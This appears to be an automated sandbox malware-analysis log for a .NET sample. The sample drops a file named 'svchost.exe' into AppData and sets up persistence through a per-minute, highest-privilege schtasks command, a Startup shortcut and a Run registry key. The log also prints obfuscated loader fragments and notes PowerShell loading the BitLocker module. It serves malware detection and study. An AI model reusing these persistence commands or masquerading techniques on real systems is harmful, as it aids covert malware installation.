                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: file.exeStatic file information: File size 4238848 > 1048576
                Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x40a400
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.DDYxZ9fO4HnwYyEKU3kg5aJrNoY9fFz2zDKgv4SBC5X3bOl5X3c26WvQUnLjPTr,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.b2Zhz2yZImGfj8ogzhWd35jPDnVQ4lizEiYjv3wENhANkBMoZNttLmS1Wng4Z82,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.Ww3VTE1OcV55ItOgrtwc3FIyxSu4O8yF5oT3fIzcBFRRyVMz2OTJBqPScByA7v4,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.kg8WgIFrMTIjPzLXVZYSZ6Q6vNdi0aqzV6NRXZxBAgYiXUrmUoBDV9VQXptMapP,CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.DJt3jyhgcDbDUbh()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fVciQAHa1R64Zp2lFi5ZQi9[2],CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.PixMCeLDzvEnijS(Convert.FromBase64String(fVciQAHa1R64Zp2lFi5ZQi9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: KzE02pfGPuRw4Lp7HTgcV3W System.AppDomain.Load(byte[])
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: _0DrM4fClbwsqX1efoo9bJeu System.AppDomain.Load(byte[])
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: _0DrM4fClbwsqX1efoo9bJeu
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AD200BD pushad ; iretd 0_2_00007FFB4AD200C1
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FFB4AD100BD pushad ; iretd 2_2_00007FFB4AD100C1
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD300BD pushad ; iretd 3_2_00007FFB4AD300C1
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 4_2_00007FFB4AD200BD pushad ; iretd 4_2_00007FFB4AD200C1
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 5_2_00007FFB4AD100BD pushad ; iretd 5_2_00007FFB4AD100C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4AC2D2A5 pushad ; iretd 6_2_00007FFB4AC2D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4AD400BD pushad ; iretd 6_2_00007FFB4AD400C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4AE12316 push 8B485F91h; iretd 6_2_00007FFB4AE1231B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AC1D2A5 pushad ; iretd 9_2_00007FFB4AC1D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AD300BD pushad ; iretd 9_2_00007FFB4AD300C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE02316 push 8B485F92h; iretd 9_2_00007FFB4AE0231B
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 20_2_00007FFB4AD300BD pushad ; iretd 20_2_00007FFB4AD300C1
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FFB4AD100BD pushad ; iretd 23_2_00007FFB4AD100C1
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 25_2_00007FFB4AD000BD pushad ; iretd 25_2_00007FFB4AD000C1
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 26_2_00007FFB4AD300BD pushad ; iretd 26_2_00007FFB4AD300C1
                Source: svchost.exe.0.dr, AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.csHigh entropy of concatenated method names: 'lsLMB0k1mzOloo8L67rwcvTn0PZhhQocNpqxrwQ4gZkiPqVhR3', 'PtZKB104eh9CXN8DSCxtOSNrPlKhxbRLgwm4Whiva4Typ1w8lV', 'bOqWL3TZwKGlR8VnMWcZeCD1LgqwmLWtdPNdRcm08gZwO78AgX', 'zQDsgPoZ144gf52sfvMHDOLPS599rx910W7UaPWeEwZXZc5Pt8'
                Source: svchost.exe.0.dr, q8AGBWimCNl26cs.csHigh entropy of concatenated method names: 'pZG5FXTSQuziM5E', 'ZmgSJl8jUzxoda8', '_0KVNAk1dEQ98X0Y', '_9ifKH25q3nDqSHFXQDeQvIYDKqY', 'AQX1Gb1tuXIRXwV6LksEWs67NGQ', 'nrgYWWZT2Lbyyb0vzoXRhEWXsHp', 'FPp3q0Y24Jm0EGBhqrolWxQYYZ9', 'F7Eqbs2zS4TAU12Bv03bK0xZGyE', 'bQLATnzcempqKkBM1uQeYDjVNRT', 'zlm0V5w9judwigvxCjy0rjzLpRP'
                Source: svchost.exe.0.dr, FY4tA6CMaVa4guGqTEmyXIf7xvr3iNtk7Lq6zTl2t38pIELcmF7U9sPLA2fruofSqNCGhqcw5vlPs.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tLd6ptJk33gbJAxVlr6JpGgKPGf0ATucNTSIQhMaD7O9MuOdgL', 'co1TLDrVkALa47756wT5Aih9k9LZYiSN7q6MDJ5Unl8LVnx3we', 'zYV42teDCCOEQB2bAsM1EDFpIYOhXm1hrpHNUyy8ROihue5G9m', '_5BlJwQSBtEeu8F40wMj6UFGwhUot5idctNfpZ5OQnh3qGsDyHd'
                Source: svchost.exe.0.dr, aTyp4zdr7PWoY7yPB1HPKF7KaU9euWm7Dk5Krr5JV4qrSsUHcriImerWCgTplK7zRKiNfoXa3Ge67XHotQU60xBtJ8aXDQD.csHigh entropy of concatenated method names: 'MzhLZg0kBXgQJBqhXKR6IFFTxRk46y82hBGaGM7pgVMvmen2L7OijPvKm0Vpst1lmuuR4i2xyEvIe4YjrkQRtoaQLCr60kB', 'mdtq64VWI9UDHwFjNIujpkSpHcqb4LO7xEWyoj7rCrLsIhN0fpEF3QXczHhsxLIFP8hjCjZ2il0YGkYPo8AKuhjDM07dCeE', 'RaXaMZVo7nmo8HmTXnchTW1c39QnXklSdjqBFSgfJKzReVqH38n29xezdSXahfU3FqHQXja7US46QOKhdH5TqgL1TIyxHxK', 'hpxrO9lHZ6xwksMIczZ8iE5GU7xaEbqbps4bVYrnw56oVy49Ef4dVoJ7zE8Tgx4P4crZN7upY33YIj7h4aZrVedHJvzsGuP', 'H6c0spaFMhUx7BwrU88KHvlbTu7ZdUAw17YWd0AM4TPmmht2e6EUIZKo4ZYLTAOqRhXl3DiKckyfKlECLPHEg4TOr5FaIbb', 'BOLrYdREAu7YNI2QeZKOzwFV4qlmpKZLYslgrUQrRlv33dvDbrenujU6OYVQgt7eGV6CNeowazc2togmGmA3Bz5jesaA9kh', '_5DA7hCEjltuvNA3G7njPLqSUecSRIv7aLkPIMVQpL4tIeev0mGEEWq4mxq57lDnG19RuuUFbYmtqJ6WfS1N7TkHjudGNAGX', 'JqpykSZiAlfZlfFNZltf6ro7xqBSmAN24blsxOvy4xXn8MQlvrcGr3EJn0OzjrbaCA6znZG095GPhMDJJrylTVnLZ8VydXB', 'NBBOvdG7lOl160aIetgUtUcGfJFYBnCMTwZuGCD34YJFUW3QbNPxdign8V4JILQrpn40DjxusIRdyWkiLdFNi2P1NJdpJha', 'BgCpiVaL6yoKrzUeGYjZAZkQXOMbmjTmJGqmt'
                Source: svchost.exe.0.dr, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.csHigh entropy of concatenated method names: 'pV5GNxReLWRbJztxWoN9sFbvGSFZA9fztkgnX', 'IOD7ZNPqydZyQrn5bZEMryMseoy6VAlio52eF', 'R39w72dzlEQ0qHulDtuOonikHSqEMz2NNJoaF', 'F42jEzeOcNEd2Xt58ZYU0JTUk4RuRfxSZIdV6', 'RfDT7ZFrHp324DJgP9zgER7W7kOeiCRZk0fAd', 'jBk8hvmnS9ilhVS4ZvHDvZBpchL7mKgqUuSuA', 'MLSNXeBlz3HyiYeZo2CitJ2y6N1IpQ7vUQpHU', 'SsXmo3zo4c7qvLlX8zcoGrsl7P55Zt2yzDNdR', '_4uT9QBxjLIJ3XEoWHbPcxsOzOyLm5JU7UWKVa', '_5JXNMvFXLbhlzKyb8f6IiKdKM0xqlLinDIokq'
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.csHigh entropy of concatenated method names: 'XeZMHJ5Sai1NRcru3Ksv6Ao', 'KzE02pfGPuRw4Lp7HTgcV3W', 'uBURafDYEtltxUsxFTjURcZ', 'XuRibjFAKdTHjD3wsDvnXcY', 'lrGpa5TteqC7tSW6sipLB26', 'XWjMSZoEYV0x7mxEB9Yx8VO', 'EYJIG6PNQGOackyfhbbyQDZ', 'LOZhRT5vgBz7uxt9rznhXXp', 'XKWOYKGBIlqUFPfHLq3g2NZ', 'm44KyzrvV1sefEns8DE0CeX'
                Source: svchost.exe.0.dr, 0m7DX7crYXoCR8NrxmQllWedGea94IvRkI5hOaDUfmiEXgVr36rOaeB.csHigh entropy of concatenated method names: 'QQWfdSG2xS4lD5bdBiEH1OpHPVxK7zcqFJKcXkutmFFjW7lDs4KuW16', 'jOxMM1N6OjprS07QpryZOFHddsoSjtz6kyIjtixcdbs7nE0jBYKdi5S', '_3a4q8G8H205iQsHOGehEiHoyUu9W5Tg8uF0usym5wOEsfoyB9KjBkDa', '_6HtZ7DyNcZ9QQHh5LzZvGDCNX8L3uRTB7yjimyzJa0vQoaG4Vbj6Rg3', 'QB2eNRYXINSW56QGLZXnFf6IpEnxt5NiwqCVzLK5AwXjhxcE5DvHZyQ', 'e7sI67VGSfSlIIKJZphNPZkmILVbC2Kg8g1UvzqyhybiBsnmeImcgtY', 'sGXHqYwXDZULYxK8gSGYFH4cRNvjM5OIf4NawRCEvYC721KExnK2hND', 'kCgCM7V1Aft4M3fuVYkOlVVEVriD7DTHnBI8ucFhzcRT3U8QXzmqy4l', 'OyDSV5z034Qg6wwSXL4llGVREs2vVJxntGddCJt0', 'zkJnnEAC1oKgBY8kIOZK9FA5Ahiu6ZgHhEZO6smM'
                Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csHigh entropy of concatenated method names: 'VvUamQexaLlDSalFARrQ9qHIOZJfWN1iZ4ag2Lp7oXLz1MRSGNPbsd8Gt5Sr6obsftbYOmO9', 'zG3nb7fsHCEEysakSCoXMtXSWtu6P63EXfJ4trA16aN5TL0jpYPB67f1mF6VV5pI8Vhj3eH7', 'cv6Qnju0tteEsmlaLOWtJAIUXwmlh8WAwx7FxLcPmRTLURaW9D1BRuDD3JBghv32kkwIhqCl', 'WrTjibEG30Y876mYzzNigsYB4cCBy7OQP84LInxtko3aFLXPPwSmYXWBWNILr5vufz9siHuD', 'dHmqVMg6wdknYUDXNdNz9ouCv8mvI06UYX7QIYMIhYj1LrLh6JCxpEwD0hqsQbk2pbkrbJIa', 'gLf7Z007cJpisow', 'uZj9L9WKLXAHIID', 'nf23VrFvRsIEPgv', 'eNb920YNU2Y66xb', '_1e9PhazEhD3rZcw'
                Source: svchost.exe.0.dr, 8KcBCZ9DCxKcKbF0FzfHqT16Ch1DMyJIO0Y5GGZtWjWIgyYVuRr4V5O.csHigh entropy of concatenated method names: 'rmYdAier1qI05Aechiv2ssjdZX9qhSbgOaAJ7uH4HlEgIdQL8TMnynq', 'X6bs1VKVEz', '_7vCg3MX6UP', 'f4ewYMWxqB', 'qGDDMD7OAG'
                Source: svchost.exe.0.dr, ktrFv2sOGwgIA9mekycjF1J3zeN8nu5eTtArKzFhw4oWEqfOdr8PLFPBGGJc0G4nBLrrbImb.csHigh entropy of concatenated method names: 'D6awLwsnT57uNrWDTfeufUJG8coJ97yfrz6Shub48ttMidXaru6dE3ivDB2dT21wtypsvoIR', 'oc58B3p2e5VnNQkOzhef7lvysxQIFgrPZE7JwlyZW4NBEwbfqNgAGIGVhCN5C4euuvceBcCN', '_7hAEB9ijwrrolHvJH8x4xi1rQvEB5e4QwJeG3oIPmOwkKOVvFmTGhBZmbB4Z6pP57exSfdz8', 'j8Vl82dVthVO8INk3TupIUVcYJlhMamIQteNscY8sgRTPoUlGMbTLIKSPGluQlA0F5ikg1iR', '_1Ojp6wqZet', 'qdN8pelKqa', 'p1ATG6liVR', 'fxU4QSNMBd', 'zwpeOddA3A', 'HKX8PLsgAD'

                Persistence and Installation Behavior

                barindex
                Drops PE files with benign system names
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
